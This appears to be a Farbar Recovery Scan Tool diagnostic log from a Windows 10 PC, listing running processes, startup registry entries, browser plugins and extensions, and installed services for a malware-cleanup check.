(Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(O&O Software GmbH) C:\Program Files\OO Software\Defrag\oodag.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.1051_none_7f2bf7ea21d201b2\TiWorker.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\CisTray.exe
(Bitsum LLC) C:\Program Files\Process Lasso\ProcessLasso.exe
(Bitsum LLC) C:\Program Files\Process Lasso\ProcessGovernor.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cis.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(O&O Software GmbH) C:\Program Files\OO Software\Defrag\oodtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Autodesk, Inc.) C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Autodesk, Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk Inc.) C:\Windows\Temp\AdAppMgrUpdater.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-08-21] (Realtek Semiconductor)
HKLM\...\Run: [OODefragTray] => C:\Program Files\OO Software\Defrag\oodtray.exe [4465448 2014-08-29] (O&O Software GmbH)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [MRT] => C:\WINDOWS\system32\MRT.exe [138634176 2017-03-14] (Microsoft Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1519800 2016-12-28] (COMODO)
HKLM\...\Run: [ZAM] => C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14471408 2017-03-06] (Copyright 2017.)
HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [721856 2016-07-01] (Autodesk, Inc.)
HKLM-x32\...\Run: [4StoryPrePatch] => C:\Program Files (x86)\GameforgeLive\Games\CZE_ces\4Story\PrePatch.exe
HKLM-x32\...\Run: [GameforgeLive] => "C:\Program Files (x86)\GameforgeLive\gfl_client.exe" -autostart
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [BitTorrent] => C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe [1984200 2017-02-14] (BitTorrent Inc.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2860832 2016-10-13] (Valve Corporation)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9105112 2016-11-15] (Piriform Ltd)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Policies\Explorer: []
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\MountPoints2: {cb3db3c3-4bfd-11e5-9bdf-d8cb8a9936d5} - "F:\setup.exe"
HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2016-02-07] (Autodesk, Inc.)
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\O&O Defrag Tray.lnk [2017-03-01]
ShortcutTarget: O&O Defrag Tray.lnk -> C:\Windows\Installer\{50C961A1-889F-4A4E-9587-2772A45B6AAD}\app_icon.ico ()
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.20 192.168.10.1
Tcpip\..\Interfaces\{6ad7d0b9-d1fb-40da-b893-a182542204a7}: [DhcpNameServer] 192.168.1.20 192.168.10.1
Internet Explorer:
==================
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://ww.google.cz/
SearchScopes: HKU\S-1-5-21-2417313614-488722605-2671369154-1001 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll [2015-11-25] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll [2015-11-25] (Oracle Corporation)
FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll [2015-11-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\plugin2\npjp2.dll [2015-11-25] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-22] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-22] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default [2017-03-16]
CHR Extension: (Prezentace Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-03-15]
CHR Extension: (Dokumenty Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-03-15]
CHR Extension: (Disk Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-03-15]
CHR Extension: (YouTube) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-03-15]
CHR Extension: (Tabulky Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-03-15]
CHR Extension: (Dokumenty Google offline) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-03-16]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-15]
CHR Extension: (Gmail) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-03-15]
CHR Extension: (Chrome Media Router) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-03-15]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 gpsvc; C:\WINDOWS\System32\gpsvc.dll [1227264 2017-03-04] (Microsoft Corporation) [File not signed]
R2 nsi; C:\WINDOWS\System32\nsisvc.dll [30720 2016-07-16] (Microsoft Corporation) [File not signed]
U2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1295376 2016-07-01] (Autodesk Inc.)
U3 AJRouter; C:\WINDOWS\System32\AJRouter.dll [24576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ALG; C:\WINDOWS\System32\alg.exe [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AppIDSvc; C:\WINDOWS\System32\appidsvc.dll [124416 2016-07-16] (Microsoft Corporation) [File not signed]
R3 Appinfo; C:\WINDOWS\System32\appinfo.dll [125952 2017-03-04] (Microsoft Corporation) [File not signed]
U3 AppReadiness; C:\WINDOWS\system32\AppReadiness.dll [560128 2017-03-04] (Microsoft Corporation) [File not signed]
U3 AppXSvc; C:\WINDOWS\system32\appxdeploymentserver.dll [2278400 2017-03-04] (Microsoft Corporation) [File not signed]
U2 AudioEndpointBuilder; C:\WINDOWS\System32\AudioEndpointBuilder.dll [337920 2016-11-02] (Microsoft Corporation) [File not signed]
R2 Audiosrv; C:\WINDOWS\System32\Audiosrv.dll [942080 2016-11-02] (Microsoft Corporation) [File not signed]
U3 AxInstSV; C:\WINDOWS\System32\AxInstSV.dll [113664 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BDESVC; C:\WINDOWS\System32\bdesvc.dll [361472 2016-09-15] (Microsoft Corporation) [File not signed]
U2 BFE; C:\WINDOWS\System32\bfe.dll [795648 2016-07-16] (Microsoft Corporation) [File not signed]
U2 BITS; C:\WINDOWS\System32\qmgr.dll [1054208 2016-10-15] (Microsoft Corporation) [File not signed]
U2 BrokerInfrastructure; C:\WINDOWS\System32\bisrv.dll [770560 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Browser; C:\WINDOWS\System32\browser.dll [134656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BthHFSrv; C:\WINDOWS\System32\BthHFSrv.dll [321536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bthserv; C:\WINDOWS\system32\bthserv.dll [157184 2016-07-16] (Microsoft Corporation) [File not signed]
U2 CDPSvc; C:\WINDOWS\System32\CDPSvc.dll [411648 2016-11-11] (Microsoft Corporation) [File not signed]
U2 CDPUserSvc; C:\WINDOWS\System32\CDPUserSvc.dll [339456 2016-11-11] (Microsoft Corporation) [File not signed]
U3 CertPropSvc; C:\WINDOWS\System32\certprop.dll [193536 2017-03-04] (Microsoft Corporation) [File not signed]
U2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [6758568 2016-12-28] (COMODO)
U3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2876088 2016-12-28] (COMODO)
U2 CoreMessagingRegistrar; C:\WINDOWS\SysWOW64\coremessaging.dll [483840 2017-03-04] (Microsoft Corporation) [File not signed]
R2 CryptSvc; C:\WINDOWS\system32\cryptsvc.dll [81920 2016-07-16] (Microsoft Corporation) [File not signed]
R2 DcomLaunch; C:\WINDOWS\system32\rpcss.dll [888320 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DcpSvc; C:\WINDOWS\system32\dcpsvc.dll [183808 2016-07-16] (Microsoft Corporation) [File not signed]
U3 defragsvc; C:\WINDOWS\System32\defragsvc.dll [511488 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DeviceAssociationService; C:\WINDOWS\system32\das.dll [447488 2016-09-27] (Microsoft Corporation) [File not signed]
U3 DeviceInstall; C:\WINDOWS\system32\umpnpmgr.dll [111104 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DevQueryBroker; C:\WINDOWS\system32\DevQueryBroker.dll [34304 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dhcp; C:\WINDOWS\system32\dhcpcore.dll [360960 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dhcp; C:\WINDOWS\SysWOW64\dhcpcore.dll [292864 2016-07-16] (Microsoft Corporation) [File not signed]
U3 diagnosticshub.standardcollector.service; C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [93184 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DiagTrack; C:\WINDOWS\system32\diagtrack.dll [1981440 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
U3 DmEnrollmentSvc; C:\WINDOWS\system32\Windows.Internal.Management.dll [407552 2017-03-04] (Microsoft Corporation) [File not signed]
U3 DmEnrollmentSvc; C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll [298496 2017-03-04] (Microsoft Corporation) [File not signed]
U3 dmwappushservice; C:\WINDOWS\system32\dmwappushsvc.dll [57344 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dnscache; C:\WINDOWS\System32\dnsrslvr.dll [264704 2017-03-04] (Microsoft Corporation) [File not signed]
U2 DoSvc; C:\WINDOWS\system32\dosvc.dll [1231872 2016-12-14] (Microsoft Corporation) [File not signed]
U3 dot3svc; C:\WINDOWS\System32\dot3svc.dll [262144 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DPS; C:\WINDOWS\system32\dps.dll [172032 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DsmSvc; C:\WINDOWS\System32\DeviceSetupManager.dll [197632 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DsSvc; C:\WINDOWS\System32\DsSvc.dll [152576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EapHost; C:\WINDOWS\System32\eapsvc.dll [112128 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EFS; C:\WINDOWS\system32\efssvc.dll [55296 2016-07-16] (Microsoft Corporation) [File not signed]
U3 embeddedmode; C:\WINDOWS\System32\embeddedmodesvc.dll [140800 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EntAppSvc; C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll [285696 2016-11-11] (Microsoft Corporation) [File not signed]
U2 EventLog; C:\WINDOWS\System32\wevtsvc.dll [1709056 2016-09-15] (Microsoft Corporation) [File not signed]
U2 EventSystem; C:\WINDOWS\system32\es.dll [453632 2016-07-16] (Microsoft Corporation) [File not signed]
U2 EventSystem; C:\WINDOWS\SysWOW64\es.dll [347136 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Fax; C:\WINDOWS\system32\fxssvc.exe [644608 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fdPHost; C:\WINDOWS\system32\fdPHost.dll [20992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 FDResPub; C:\WINDOWS\system32\fdrespub.dll [35328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fhsvc; C:\WINDOWS\system32\fhsvc.dll [122368 2016-07-16] (Microsoft Corporation) [File not signed]
U2 FontCache; C:\WINDOWS\system32\FntCache.dll [1840640 2017-03-04] (Microsoft Corporation) [File not signed]
U3 FrameServer; C:\WINDOWS\system32\FrameServer.dll [805888 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [520416 2014-01-28] (Futuremark)
U3 hidserv; C:\WINDOWS\system32\hidserv.dll [36864 2016-07-16] (Microsoft Corporation) [File not signed]
U3 hidserv; C:\WINDOWS\SysWOW64\hidserv.dll [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HomeGroupListener; C:\WINDOWS\system32\ListSvc.dll [274432 2016-11-02] (Microsoft Corporation) [File not signed]
U3 HomeGroupProvider; C:\WINDOWS\system32\provsvc.dll [447488 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HomeGroupProvider; C:\WINDOWS\SysWOW64\provsvc.dll [385536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HvHost; C:\WINDOWS\System32\hvhostsvc.dll [67584 2016-07-16] (Microsoft Corporation) [File not signed]
U3 icssvc; C:\WINDOWS\System32\tetheringservice.dll [202240 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IKEEXT; C:\WINDOWS\System32\ikeext.dll [932352 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
U4 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [File not signed]
U2 iphlpsvc; C:\WINDOWS\System32\iphlpsvc.dll [945664 2017-03-04] (Microsoft Corporation) [File not signed]
U3 irmon; C:\WINDOWS\System32\irmon.dll [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [File not signed]
U2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [223008 2015-06-24] (Intel Corporation)
U3 KeyIso; C:\WINDOWS\system32\keyiso.dll [96768 2016-07-16] (Microsoft Corporation) [File not signed]
U3 KeyIso; C:\WINDOWS\SysWOW64\keyiso.dll [70656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 KtmRm; C:\WINDOWS\system32\msdtckrm.dll [376320 2016-07-16] (Microsoft Corporation) [File not signed]
U2 LanmanServer; C:\WINDOWS\system32\srvsvc.dll [305152 2016-07-16] (Microsoft Corporation) [File not signed]
R2 LanmanWorkstation; C:\WINDOWS\System32\wkssvc.dll [283648 2016-11-11] (Microsoft Corporation) [File not signed]
U3 lfsvc; C:\WINDOWS\System32\lfsvc.dll [37376 2016-07-16] (Microsoft Corporation) [File not signed]
U3 LicenseManager; C:\WINDOWS\system32\LicenseManagerSvc.dll [26112 2016-09-27] (Microsoft Corporation) [File not signed]
U3 lltdsvc; C:\WINDOWS\System32\lltdsvc.dll [275456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 lmhosts; C:\WINDOWS\System32\lmhsvc.dll [27136 2016-07-16] (Microsoft Corporation) [File not signed]
U2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
U2 LSM; C:\WINDOWS\System32\lsm.dll [691712 2016-11-11] (Microsoft Corporation) [File not signed]
U2 MapsBroker; C:\WINDOWS\System32\moshost.dll [82944 2017-03-04] (Microsoft Corporation) [File not signed]
U2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
U3 MessagingService; C:\WINDOWS\System32\MessagingService.dll [52224 2016-07-16] (Microsoft Corporation) [File not signed]
U2 MpsSvc; C:\WINDOWS\system32\mpssvc.dll [893952 2017-03-04] (Microsoft Corporation) [File not signed]
U3 MSDTC; C:\WINDOWS\System32\msdtc.exe [147456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSiSCSI; C:\WINDOWS\system32\iscsiexe.dll [151552 2016-07-16] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\WINDOWS\System32\msiexec.exe [65024 2016-07-16] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\WINDOWS\SysWOW64\msiexec.exe [58368 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcaSvc; C:\WINDOWS\System32\ncasvc.dll [167936 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcbService; C:\WINDOWS\System32\ncbservice.dll [339968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcdAutoSetup; C:\WINDOWS\System32\NcdAutoSetup.dll [88576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netlogon; C:\WINDOWS\system32\netlogon.dll [827392 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netlogon; C:\WINDOWS\SysWOW64\netlogon.dll [670720 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netman; C:\WINDOWS\System32\netman.dll [259072 2016-07-16] (Microsoft Corporation) [File not signed]
U3 netprofm; C:\WINDOWS\System32\netprofmsvc.dll [519168 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NetSetupSvc; C:\WINDOWS\System32\NetSetupSvc.dll [265728 2016-11-02] (Microsoft Corporation) [File not signed]
U3 NgcCtnrSvc; C:\WINDOWS\System32\NgcCtnrSvc.dll [330752 2017-03-04] (Microsoft Corporation) [File not signed]
U3 NgcSvc; C:\WINDOWS\system32\ngcsvc.dll [983040 2016-10-05] (Microsoft Corporation) [File not signed]
U2 NlaSvc; C:\WINDOWS\System32\nlasvc.dll [368640 2016-10-05] (Microsoft Corporation) [File not signed]
U3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [6053312 2016-08-22] (INCA Internet Co., Ltd.)
U2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
U3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
U2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
U2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-02-23] (NVIDIA Corporation)
U2 OneSyncSvc; C:\WINDOWS\System32\APHostService.dll [366592 2016-07-16] (Microsoft Corporation) [File not signed]
U2 OODefragAgent; C:\Program Files\OO Software\Defrag\oodag.exe [1660200 2014-08-29] (O&O Software GmbH)
U4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2015-12-02] (Electronic Arts)
U3 p2pimsvc; C:\WINDOWS\system32\pnrpsvc.dll [345088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 p2psvc; C:\WINDOWS\system32\p2psvc.dll [425472 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PerfHost; C:\WINDOWS\SysWow64\perfhost.exe [21504 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PhoneSvc; C:\WINDOWS\System32\PhoneService.dll [781824 2016-09-27] (Microsoft Corporation) [File not signed]
U3 PimIndexMaintenanceSvc; C:\WINDOWS\System32\PimIndexMaintenance.dll [203264 2017-03-04] (Microsoft Corporation) [File not signed]
U3 pla; C:\WINDOWS\system32\pla.dll [1457152 2016-07-16] (Microsoft Corporation) [File not signed]
U3 pla; C:\WINDOWS\SysWOW64\pla.dll [1536512 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PlugPlay; C:\WINDOWS\system32\umpnpmgr.dll [111104 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PNRPAutoReg; C:\WINDOWS\system32\pnrpauto.dll [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PNRPsvc; C:\WINDOWS\system32\pnrpsvc.dll [345088 2016-07-16] (Microsoft Corporation) [File not signed]
